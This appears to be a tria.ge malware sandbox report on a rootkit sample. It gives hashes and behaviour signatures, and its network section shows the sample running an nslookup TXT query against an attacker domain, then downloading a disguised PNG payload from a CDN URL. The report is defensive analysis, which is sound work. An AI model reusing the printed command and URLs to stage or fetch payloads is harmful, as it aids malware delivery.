Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
10Bootkits/5...1a.exe
windows7-x64
1Bootkits/5...1a.exe
windows10-2004-x64
6Bootkits/6...86.exe
windows7-x64
7Bootkits/6...86.exe
windows10-2004-x64
7Bootkits/8...f6.msi
windows7-x64
7Bootkits/8...f6.msi
windows10-2004-x64
7Bootkits/f...b1.exe
windows7-x64
7Bootkits/f...b1.exe
windows10-2004-x64
Rootkits/0...c7.exe
windows7-x64
8Rootkits/0...c7.exe
windows10-2004-x64
8Rootkits/0...6d.exe
windows7-x64
10Rootkits/0...6d.exe
windows10-2004-x64
1Rootkits/0...ae.exe
windows7-x64
1Rootkits/0...ae.exe
windows10-2004-x64
1Rootkits/0...3e.exe
windows7-x64
7Rootkits/0...3e.exe
windows10-2004-x64
10Rootkits/0...10.exe
windows7-x64
7Rootkits/0...10.exe
windows10-2004-x64
7Rootkits/2...8e.dll
windows7-x64
1Rootkits/2...8e.dll
windows10-2004-x64
1Rootkits/2...a4.exe
windows7-x64
10Rootkits/2...a4.exe
windows10-2004-x64
Rootkits/4...1b.exe
windows7-x64
7Rootkits/4...1b.exe
windows10-2004-x64
7Rootkits/6...d9.exe
windows7-x64
1Rootkits/6...d9.exe
windows10-2004-x64
1Rootkits/7...e8.exe
windows7-x64
7Rootkits/7...e8.exe
windows10-2004-x64
7Rootkits/8...22.exe
windows7-x64
1Rootkits/8...22.exe
windows10-2004-x64
1Rootkits/9...99.exe
windows7-x64
8Rootkits/9...99.exe
windows10-2004-x64
8Analysis
-
max time kernel
118s -
max time network
131s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
08/11/2023, 03:15 UTC
Behavioral task
behavioral1
Sample
Bootkits/5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
Bootkits/5ef62c780d7c9f82dea098972f66d5b3367841913444933cdb779adaecd06d1a.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral3
Sample
Bootkits/6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
Resource
win7-20231023-en
Behavioral task
behavioral4
Sample
Bootkits/6b0cd074a6c556f4d1fe0088c15160eb13f847974c4307f9eeeea4dc33d49286.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral5
Sample
Bootkits/8dcc573293ae9a545655a47e23f106738a190f5318c31124bd3a73b12f128df6.msi
Resource
win7-20231020-en
Behavioral task
behavioral6
Sample
Bootkits/8dcc573293ae9a545655a47e23f106738a190f5318c31124bd3a73b12f128df6.msi
Resource
win10v2004-20231020-en
Behavioral task
behavioral7
Sample
Bootkits/f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Resource
win7-20231025-en
Behavioral task
behavioral8
Sample
Bootkits/f428b4d0673ae67472fbe212086e70eeb5b6876e80a74b59ff8ba3e6def5e9b1.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral9
Sample
Rootkits/03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
Resource
win7-20231020-en
Behavioral task
behavioral10
Sample
Rootkits/03e903602037420acf4d1bc5084923c59385c5594f3a2de6fcf320bd4746d6c7.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral11
Sample
Rootkits/044d94183a778f39e47f255fcb985d20bfd885771a74217cfbca9e63d7d9936d.exe
Resource
win7-20231023-en
Behavioral task
behavioral12
Sample
Rootkits/044d94183a778f39e47f255fcb985d20bfd885771a74217cfbca9e63d7d9936d.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral13
Sample
Rootkits/0925b8985b19d7925d68186d666b0050a4cb3f2a577d64765d770a57a2eab9ae.exe
Resource
win7-20231020-en
Behavioral task
behavioral14
Sample
Rootkits/0925b8985b19d7925d68186d666b0050a4cb3f2a577d64765d770a57a2eab9ae.exe
Resource
win10v2004-20231020-en
Behavioral task
behavioral15
Sample
Rootkits/096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe
Resource
win7-20231023-en
Behavioral task
behavioral16
Sample
Rootkits/096322b16a7395e5534e9db6752aab1bd54275515f33f993d066ec7b46ed5b3e.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral17
Sample
Rootkits/0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Resource
win7-20231023-en
Behavioral task
behavioral18
Sample
Rootkits/0b1b37d85a27819a8b4b9d7691e55dfc93311f7d5159433d1ac09854fcb13510.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral19
Sample
Rootkits/2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e.dll
Resource
win7-20231023-en
Behavioral task
behavioral20
Sample
Rootkits/2141974f665f4d8fecb6d8ea06add624b57f320f901368847175570ee716fd8e.dll
Resource
win10v2004-20231023-en
Behavioral task
behavioral21
Sample
Rootkits/22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
Resource
win7-20231020-en
Behavioral task
behavioral22
Sample
Rootkits/22ee7b8104599b47313195598ffc34aafd6a6552dcce0e7b3232ced3a90ac9a4.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral23
Sample
Rootkits/40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Resource
win7-20231023-en
Behavioral task
behavioral24
Sample
Rootkits/40fd1fcff12afcf503175d91a18d7a6f7b4ade68726328db38eb6fd74304561b.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral25
Sample
Rootkits/659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9.exe
Resource
win7-20231025-en
Behavioral task
behavioral26
Sample
Rootkits/659e0d1b2405cadfa560fe648cbf6866720dd40bb6f4081d3dce2dffe20595d9.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral27
Sample
Rootkits/757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Resource
win7-20231023-en
Behavioral task
behavioral28
Sample
Rootkits/757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
Resource
win10v2004-20231025-en
Behavioral task
behavioral29
Sample
Rootkits/84ed7fec67de5621806dbb43af5167a5fc60ab7f2403448519dc0eca2b8f9022.exe
Resource
win7-20231023-en
Behavioral task
behavioral30
Sample
Rootkits/84ed7fec67de5621806dbb43af5167a5fc60ab7f2403448519dc0eca2b8f9022.exe
Resource
win10v2004-20231023-en
Behavioral task
behavioral31
Sample
Rootkits/9114dc1c44f6a1b7d63ca95e04541d833c49a3e65a717471042bd0ec19a3eb99.exe
Resource
win7-20231023-en
Behavioral task
behavioral32
Sample
Rootkits/9114dc1c44f6a1b7d63ca95e04541d833c49a3e65a717471042bd0ec19a3eb99.exe
Resource
win10v2004-20231023-en
General
-
Target
Rootkits/757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe
-
Size
9.5MB
-
MD5
d76e73e0235f77c9bf5578eb51a9bf9a
-
SHA1
23f26097829f9591164c509831b627964ffdecf9
-
SHA256
757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8
-
SHA512
a41f9f136fec5842aeeb3ad87ad6874a708c374bb6680ce7a5cbd4539e262e9096825c8246b0cc5c280358e2f51c5ed5fa67050b33b67bb3e2349db3fae6db18
-
SSDEEP
196608:xOw0fyB+aXfyBb861vQowxMwCYRE3xSnZtAJzwCiHjx40TJnBGy4n6C:x+aX6eFo+ZJEBSnbASBHjx40TlE6C
Malware Config
Signatures
-
Unexpected DNS network traffic destination 2 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 114.114.114.114 Destination IP 114.114.114.114 -
resource yara_rule behavioral27/memory/2952-0-0x0000000000400000-0x000000000151E000-memory.dmp vmprotect behavioral27/memory/2952-4-0x0000000000400000-0x000000000151E000-memory.dmp vmprotect behavioral27/memory/2952-5-0x0000000000400000-0x000000000151E000-memory.dmp vmprotect -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 472 Process not Found -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2952 wrote to memory of 2916 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe 28 PID 2952 wrote to memory of 2916 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe 28 PID 2952 wrote to memory of 2916 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe 28 PID 2952 wrote to memory of 2916 2952 757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe 28
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"C:\Users\Admin\AppData\Local\Temp\Rootkits\757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2952 -
C:\Windows\SysWOW64\nslookup.exenslookup -qt=TXT mxgmxbbyxb.bbyyjy.com 114.114.114.1142⤵PID:2916
-
Network
-
Remote address:114.114.114.114:53Request114.114.114.114.in-addr.arpaIN PTRResponse114.114.114.114.in-addr.arpaIN PTRpublic1114dnscom
-
Remote address:114.114.114.114:53Requestmxgmxbbyxb.bbyyjy.comIN TXTResponsemxgmxbbyxb.bbyyjy.comIN TXT�20220718#20220710#1#http://pic.rmb.bdstatic.com/bjh/cbd93e817eb5cf12b2b6dacd13453d39.png#http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.png
-
Remote address:8.8.8.8:53Requestpic.rmb.bdstatic.comIN AResponsepic.rmb.bdstatic.comIN CNAMEpic.rmb.bdstatic.com.a.bdydns.compic.rmb.bdstatic.com.a.bdydns.comIN CNAMEopencdnpicrmb.jomodns.comopencdnpicrmb.jomodns.comIN CNAMEopencdnpicrmb.gshifen.comopencdnpicrmb.gshifen.comIN A185.10.104.115
-
GEThttp://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.png757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exeRemote address:185.10.104.115:80RequestGET /bjh/e7cc2bdf04ec36188e6c6869c73b630f.png HTTP/1.1
Host: pic.rmb.bdstatic.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
ResponseHTTP/1.1 200 OK
Date: Wed, 08 Nov 2023 03:18:55 GMT
Content-Type: image/png
Content-Length: 514572
Connection: keep-alive
Expires: Wed, 18 Oct 2023 14:10:54 GMT
Last-Modified: Mon, 11 Jul 2022 16:01:59 GMT
ETag: "e7cc2bdf04ec36188e6c6869c73b630f"
Age: 108007
Accept-Ranges: bytes
Content-MD5: 58wr3wTsNhiObGhpxztjDw==
x-bce-content-crc32: 281991201
x-bce-debug-id: Wk069zDA1+zaz2OWJ61WpSkcmQlQhQMfHiX41JLdp9ypeFJ7yhL8z0PLE97RayPdfk2fHgKldRDqqRdkIymWmA==
x-bce-request-id: 6b46522b-1a55-405e-8b0f-1e580692ca03
x-bce-restore-cache: -
x-bce-restore-tier: -
x-bce-storage-class: STANDARD
Timing-Allow-Origin: *
Ohc-Global-Saved-Time: Sun, 15 Oct 2023 14:10:54 GMT
Ohc-Cache-HIT: fra01-sys-jomo2.fra01.baidu.com [4], zhuzuncache50 [4], wzix104 [2]
Ohc-File-Size: 514572
X-Cache-Status: HIT
-
185.10.104.115:80http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.pnghttp757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe9.9kB 531.1kB 209 393
HTTP Request
GET http://pic.rmb.bdstatic.com/bjh/e7cc2bdf04ec36188e6c6869c73b630f.pngHTTP Response
200
-
74 B 106 B 1 1
DNS Request
114.114.114.114.in-addr.arpa
-
67 B 237 B 1 1
DNS Request
mxgmxbbyxb.bbyyjy.com
-
8.8.8.8:53pic.rmb.bdstatic.comdns757cd417096f37de99461b69b70ccc532fb294b8ecbf18e3fddaea7bb6058ce8.exe66 B 198 B 1 1
DNS Request
pic.rmb.bdstatic.com
DNS Response
185.10.104.115